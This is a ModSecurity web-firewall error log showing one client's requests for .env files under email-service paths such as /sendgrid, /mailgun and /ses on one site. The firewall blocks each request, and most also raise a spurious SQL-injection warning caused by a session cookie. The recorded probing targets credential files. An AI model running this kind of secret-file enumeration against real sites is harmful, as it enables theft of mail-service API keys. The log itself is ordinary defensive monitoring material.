[Mon May 11 16:33:48.568658 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/newsletter/.env"] [unique_id "agHozFV4kyjgo4bQBUhX5AAAAM0"]
[Mon May 11 16:33:48.568913 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/newsletter/.env"] [unique_id "agHozFV4kyjgo4bQBUhX5AAAAM0"]
[Mon May 11 16:33:48.733132 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /ses/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/ses/.env"] [unique_id "agHozFV4kyjgo4bQBUhX5QAAAM0"]
[Mon May 11 16:33:48.733518 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/ses/.env"] [unique_id "agHozFV4kyjgo4bQBUhX5QAAAM0"]
[Mon May 11 16:33:48.733701 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/ses/.env"] [unique_id "agHozFV4kyjgo4bQBUhX5QAAAM0"]
[Mon May 11 16:33:48.733944 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/ses/.env"] [unique_id "agHozFV4kyjgo4bQBUhX5QAAAM0"]
[Mon May 11 16:33:48.897748 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /sendgrid/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/sendgrid/.env"] [unique_id "agHozFV4kyjgo4bQBUhX5gAAAM0"]
[Mon May 11 16:33:48.898132 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/sendgrid/.env"] [unique_id "agHozFV4kyjgo4bQBUhX5gAAAM0"]
[Mon May 11 16:33:48.898343 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/sendgrid/.env"] [unique_id "agHozFV4kyjgo4bQBUhX5gAAAM0"]
[Mon May 11 16:33:48.898598 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/sendgrid/.env"] [unique_id "agHozFV4kyjgo4bQBUhX5gAAAM0"]
[Mon May 11 16:33:49.064546 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /sparkpost/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/sparkpost/.env"] [unique_id "agHozVV4kyjgo4bQBUhX5wAAAM0"]
[Mon May 11 16:33:49.064931 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/sparkpost/.env"] [unique_id "agHozVV4kyjgo4bQBUhX5wAAAM0"]
[Mon May 11 16:33:49.065122 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/sparkpost/.env"] [unique_id "agHozVV4kyjgo4bQBUhX5wAAAM0"]
[Mon May 11 16:33:49.065383 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/sparkpost/.env"] [unique_id "agHozVV4kyjgo4bQBUhX5wAAAM0"]
[Mon May 11 16:33:49.230517 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /postmark/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/postmark/.env"] [unique_id "agHozVV4kyjgo4bQBUhX6AAAAM0"]
[Mon May 11 16:33:49.230893 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/postmark/.env"] [unique_id "agHozVV4kyjgo4bQBUhX6AAAAM0"]
[Mon May 11 16:33:49.231075 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/postmark/.env"] [unique_id "agHozVV4kyjgo4bQBUhX6AAAAM0"]
[Mon May 11 16:33:49.231340 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/postmark/.env"] [unique_id "agHozVV4kyjgo4bQBUhX6AAAAM0"]
[Mon May 11 16:33:49.400349 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /mailgun/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/mailgun/.env"] [unique_id "agHozVV4kyjgo4bQBUhX6QAAAM0"]
[Mon May 11 16:33:49.400720 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/mailgun/.env"] [unique_id "agHozVV4kyjgo4bQBUhX6QAAAM0"]
[Mon May 11 16:33:49.400902 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/mailgun/.env"] [unique_id "agHozVV4kyjgo4bQBUhX6QAAAM0"]
[Mon May 11 16:33:49.401150 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/mailgun/.env"] [unique_id "agHozVV4kyjgo4bQBUhX6QAAAM0"]
[Mon May 11 16:33:49.564571 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /mandrill/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/mandrill/.env"] [unique_id "agHozVV4kyjgo4bQBUhX6gAAAM0"]
[Mon May 11 16:33:49.564950 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/mandrill/.env"] [unique_id "agHozVV4kyjgo4bQBUhX6gAAAM0"]
[Mon May 11 16:33:49.565138 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/mandrill/.env"] [unique_id "agHozVV4kyjgo4bQBUhX6gAAAM0"]
[Mon May 11 16:33:49.565422 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/mandrill/.env"] [unique_id "agHozVV4kyjgo4bQBUhX6gAAAM0"]
[Mon May 11 16:33:49.728447 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /mailjet/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/mailjet/.env"] [unique_id "agHozVV4kyjgo4bQBUhX6wAAAM0"]
[Mon May 11 16:33:49.728820 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/mailjet/.env"] [unique_id "agHozVV4kyjgo4bQBUhX6wAAAM0"]
[Mon May 11 16:33:49.729000 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/mailjet/.env"] [unique_id "agHozVV4kyjgo4bQBUhX6wAAAM0"]
[Mon May 11 16:33:49.729264 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/mailjet/.env"] [unique_id "agHozVV4kyjgo4bQBUhX6wAAAM0"]
[Mon May 11 16:33:49.894443 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /brevo/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/brevo/.env"] [unique_id "agHozVV4kyjgo4bQBUhX7AAAAM0"]
[Mon May 11 16:33:49.894816 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/brevo/.env"] [unique_id "agHozVV4kyjgo4bQBUhX7AAAAM0"]
[Mon May 11 16:33:49.895000 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/brevo/.env"] [unique_id "agHozVV4kyjgo4bQBUhX7AAAAM0"]
[Mon May 11 16:33:49.895272 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/brevo/.env"] [unique_id "agHozVV4kyjgo4bQBUhX7AAAAM0"]
[Mon May 11 16:33:50.058457 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /transactional/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/transactional/.env"] [unique_id "agHozlV4kyjgo4bQBUhX7QAAAM0"]
[Mon May 11 16:33:50.058842 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/transactional/.env"] [unique_id "agHozlV4kyjgo4bQBUhX7QAAAM0"]
